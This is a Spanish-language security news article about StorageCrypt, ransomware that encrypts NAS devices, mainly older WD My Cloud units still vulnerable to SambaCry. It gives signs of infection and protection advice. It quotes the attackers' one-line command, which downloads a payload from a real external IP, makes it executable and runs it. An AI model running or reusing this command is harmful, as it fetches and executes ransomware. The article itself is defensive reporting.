StorageCrypt, un ransomware centrado en infectar dispositivos NAS afectados por SambaCry

StorageCrypt, un ransomware centrado en infectar dispositivos NAS afectados por SambaCry

Adrián Crespo

Además de los PCs de los usuarios, los ciberdelincuentes también centran sus esfuerzos en atacar los NAS. Recientemente, se ha sabido que una amenaza conocida con el nombre de StorageCrypt ha comenzado a afectar a estos dispositivos, sobre todo aquellos que aún son vulnerables a SambaCry, permitiendo el cifrado de la información y que esta quede inaccesible. ¿Debo estar preocupado por la seguridad de mi dispositivo NAS?

La respuesta a esta pregunta es que depende de lo concienciado que esté el fabricante con la seguridad de los usuarios de sus equipos. Expertos en seguridad han observado que, los cibercelincuentes, se están centrando sobre todo en afectar a dispositivos WD My Cloud, equipos que no se han mostrado seguros, continuando muchos afectados por la vulnerabilidad mencionada anteriormente. Es cierto que los usuarios en muchas ocasiones nos olvidamos de revisar si existen actualizaciones de seguridad. En el caso de este fabricante no es esta situación. Desde WD no han publicado actualizaciones que resuelvan esta vulnerabilidad, afectando sobre todo a aquellos dispositivos más antiguos. El resultado: el dispositivo ha quedado expuesto a SambaCry.

Los usuarios están reportando que de buenas a primeras sus archivos están cifrados. Junto a estos, se adjunta una nota en el volumen en la que se pueden encontrar las instrucciones para su recuperación. El usuario debe abonar entre 2 y 4 Bitcoins. Como siempre, el pago de la cantidad queda descartado. De lo contrario, estamos alimentando el apogeo de este tipo de amenazas.

Detalles del ransomware StorageCrypt

Para todo aquel que no conozca esta vulnerabilidad, vamos a realizar una breve explicación. SambaCry es un fallo de seguridad que está vinculado al servicio Samba de los sistemas operativos GNU/Linux. Si se utiliza de forma satisfactoria, el atacante dispondría de acceso a una terminal que permitiría el copiado de los archivos y la ejecución de comandos en los dispositivos afectados.

En el caso que nos ocupa. Los ciberdelincuentes están utilizando el siguiente comando:

wget -O /tmp/apaceha http://45.76.102.45/sambacry && chmod +x /tmp/apaceha &&nohup /tmp/apaceha >/dev/null 2>&1 &

Es decir, realiza la descarga de un archivo llamado SambaCry que se almacena con el nombre de apaceha, almacenándolo en la carpeta /tmp del dispositivo. Posteriormente, lo ejecuta y comienza el cifrado de la información.

¿Cómo puedo saber si mi NAS está infectado?

El detalle más indicativo es la existencia de ficheros .locked cuya extensión real es diferente. En segundo lugar, la presencia del archivo _READ_ME_FOR_DECRYPT.txt. Este contiene las instrucciones para recuperar el acceso y la cantidad que se debe abonar a los ciberdelincuentes. Como ya hemos indicado anteriormente, no es recomendable realizar el pago.

Los usuarios también se pueden topar con un ejecutable con el nombre 美女与野兽.exe. De acuerdo con VirtusTotal, se trata de un proceso malware que afecta a los equipos con sistema operativo Windows, permitiendo que las carpetas de estos equipos sean visibles desde los dispositivos NAS infectados. También encontramos un Autorun.inf. Expertos en seguridad creen que, una vez cifrada la información del NAS, la idea de los ciberdelincuentes es utilizar estos dispositivos para distribuir la amenaza entre los equipos con sistema operativo de los de Redmond.

Proteger mi NAS

Si el fabricante no pose de su parte, el usuario tiene una solución que salomónica. Para garantizar que nuestro dispositivo no puede verse afectado tendremos que aislarlo de Internet. Es decir, que a través de la IP pública de nuestro router no sea accesible a través del puerto de ningún servicio. De esta forma, podemos utilizar el equipo como hasta el momento y sin poner en peligro la información almacenada en él.